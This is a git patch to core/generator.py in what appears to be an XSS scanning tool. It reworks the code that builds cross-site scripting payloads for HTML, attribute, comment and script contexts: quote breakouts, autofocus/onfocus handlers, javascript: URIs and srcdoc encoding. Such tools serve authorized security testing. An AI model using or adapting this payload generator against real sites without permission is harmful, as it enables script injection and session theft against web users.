From 3b3b23a86c0193bff08ad27907e167020e01ba33 Mon Sep 17 00:00:00 2001 From: Somdev Sangwan Date: Fri, 19 Apr 2019 07:56:17 +0530 Subject: [PATCH] adapt to API changes, support for more contexts --- core/generator.py | 127 +++++++++++++++++++++------------------------- 1 file changed, 58 insertions(+), 69 deletions(-) diff --git a/core/generator.py b/core/generator.py index 67490d3..281a31c 100644 --- a/core/generator.py +++ b/core/generator.py @@ -9,105 +9,94 @@ def generator(occurences, response): vectors = {11: set(), 10: set(), 9: set(), 8: set(), 7: set(), 6: set(), 5: set(), 4: set(), 3: set(), 2: set(), 1: set()} for i in occurences: - context = occurences[i]['context'][0] - breaker = occurences[i]['context'][1] - special = occurences[i]['context'][2] - try: - attributeName = list(occurences[i]['context'][3].keys())[0] - attributeValue = list(occurences[i]['context'][3].values())[0] - except AttributeError: - attributeName = occurences[i]['context'][3] - if special not in badTags: - special = '' - elif context == 'attribute': - special = '' - else: - special = '' + context = occurences[i]['context'] if context == 'html': lessBracketEfficiency = occurences[i]['score']['<'] greatBracketEfficiency = occurences[i]['score']['>'] - breakerEfficiency = occurences[i]['score'][breaker] - if breaker == '\'' or breaker == '"': - breaker = '' - breakerEfficiency = 100 ends = ['//'] + badTag = occurences[i]['details']['badTag'] if 'badTag' in occurences[i]['details'] else '' if greatBracketEfficiency == 100: ends.append('>') - if lessBracketEfficiency == breakerEfficiency == 100: + if lessBracketEfficiency: payloads = genGen(fillings, eFillings, lFillings, - eventHandlers, tags, functions, ends, breaker, special) + eventHandlers, tags, functions, ends, badTag) for payload in payloads: vectors[10].add(payload) elif context == 'attribute': found = False - breakerEfficiency = occurences[i]['score'][breaker] + quote = occurences[i]['details']['quote'] + Type = occurences[i]['details']['type'] + attributeName = occurences[i]['details']['name'] + attributeValue = occurences[i]['details']['value'] + quoteEfficiency = occurences[i]['score'][quote] if quote in occurences[i]['score'] else 100 greatBracketEfficiency = occurences[i]['score']['>'] ends = ['//'] if greatBracketEfficiency == 100: ends.append('>') - if greatBracketEfficiency == 100 and breakerEfficiency == 100: + if greatBracketEfficiency == 100 and quoteEfficiency == 100: payloads = genGen(fillings, eFillings, lFillings, - eventHandlers, tags, functions, ends, breaker, special) + eventHandlers, tags, functions, ends) for payload in payloads: - if breaker: - payload = payload.replace(breaker, breaker + '>') - else: - payload = '>' + payload + payload = quote + '>' + payload found = True - vectors[6].add(payload) - if breakerEfficiency == 100: + vectors[9].add(payload) + if quoteEfficiency == 100: for filling in fillings: for function in functions: - vector = breaker + filling + 'auTOfOcuS' + \ - filling + 'OnFoCUs' + '=' + breaker + function + vector = quote + filling + r('autofocus') + \ + filling + r('onfocus') + '=' + quote + function found = True - vectors[6].add(vector) - if breakerEfficiency == 90: + vectors[8].add(vector) + if quoteEfficiency == 90: for filling in fillings: for function in functions: - vector = '\\' + breaker + filling + 'auTOfOcuS' + filling + \ - 'OnFoCUs' + '=' + function + filling + '\\' + breaker + vector = '\\' + quote + filling + r('autofocus') + filling + \ + r('onfocus') + '=' + function + filling + '\\' + quote found = True - vectors[6].add(vector) - if attributeName == 'srcdoc': - if occurences[i]['score']['<']: - if occurences[i]['score']['>']: - del ends[:] - ends.append('%26gt;') - payloads = genGen( - fillings, eFillings, lFillings, eventHandlers, tags, functions, ends, '', '') - for payload in payloads: + vectors[7].add(vector) + if Type == 'value': + if attributeName == 'srcdoc': + if occurences[i]['score']['<']: + if occurences[i]['score']['>']: + del ends[:] + ends.append('%26gt;') + payloads = genGen( + fillings, eFillings, lFillings, eventHandlers, tags, functions, ends) + for payload in payloads: + found = True + vectors[9].add(payload.replace('<', '%26lt;')) + elif attributeName == 'href' and attributeValue == xsschecker: + for function in functions: found = True - vectors[9].add(payload.replace('<', '%26lt;')) - if attributeName.startswith('on'): - closer = jsContexter(attributeValue) - breaker = '' - for char in attributeValue.split(xsschecker)[1]: - if char in ['\'', '"', '`']: - breaker = char - break - if closer: + vectors[10].add(r('javascript:') + function) + elif attributeName.startswith('on'): + closer = jsContexter(attributeValue) + quote = '' + for char in attributeValue.split(xsschecker)[1]: + if char in ['\'', '"', '`']: + quote = char + break suffix = '//\\' for filling in jFillings: for function in functions: - vector = breaker + closer + filling + function + suffix - if found: - vectors[7].add(vector) - else: - vectors[9].add(vector) - elif breakerEfficiency > 83: - suffix = '//' - for filling in jFillings: - for function in functions: - if '=' in function: - function = '(' + function + ')' - if breaker == '': - filling = '' - vector = '\\' + breaker + closer + filling + function + suffix + vector = quote + closer + filling + function + suffix if found: vectors[7].add(vector) else: vectors[9].add(vector) + if quoteEfficiency > 83: + suffix = '//' + for filling in jFillings: + for function in functions: + if '=' in function: + function = '(' + function + ')' + if quote == '': + filling = '' + vector = '\\' + quote + closer + filling + function + suffix + if found: + vectors[7].add(vector) + else: + vectors[9].add(vector) elif context == 'comment': lessBracketEfficiency = occurences[i]['score']['<'] @@ -118,7 +107,7 @@ def generator(occurences, response): ends.append('>') if lessBracketEfficiency == breakerEfficiency == 100: payloads = genGen(fillings, eFillings, lFillings, - eventHandlers, tags, functions, ends, breaker, special) + eventHandlers, tags, functions, ends) for payload in payloads: vectors[10].add(payload) elif context == 'script': @@ -139,7 +128,7 @@ def generator(occurences, response): if scriptEfficiency == 100: breaker = r('') payloads = genGen(fillings, eFillings, lFillings, - eventHandlers, tags, functions, ends, breaker, special) + eventHandlers, tags, functions, ends) for payload in payloads: vectors[10].add(payload) if closer: